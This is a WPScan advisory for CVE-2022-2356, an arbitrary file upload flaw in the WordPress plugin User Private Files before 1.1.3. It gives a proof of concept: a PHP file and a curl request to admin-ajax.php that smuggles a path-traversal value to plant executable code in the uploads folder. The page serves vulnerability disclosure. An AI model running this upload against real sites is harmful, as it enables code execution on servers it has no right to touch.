WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

User Private Files < 1.1.3 - Subscriber+ Arbitrary File Upload

Description

The plugin does not filter file extensions when letting users upload files on the server, which may lead to malicious code being uploaded.

Proof of Concept

1) Create a file named exploit.php, which contains: <?php phpinfo();

2) Find the upf_ajax_nonce on the site's front page.

2) Run the following cURL request, 

curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -b 'YOUR COOKIES' -F '[email protected]' -F 'docext=/../../exploit.php' -F 'doc_type=doc/pdf' -F 'action=upload_doc_callback' -F 'upf_nonce=YOUR NONCE'

# You can find the uploaded PHP file at: https://target/blog/wp-content/uploads/exploit.php

Affects Plugins

user-private-files
Fixed in version 1.1.3

References

CVE
CVE-2022-2356

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter
raadfhaddad
Verified

Yes

WPVDB ID
67f3948e-27d4-47a8-8572-616143b9cf43

Timeline

Publicly Published

2022-07-12 (about 6 months ago)

Added

2022-07-12 (about 6 months ago)

Last Updated

2022-08-22 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin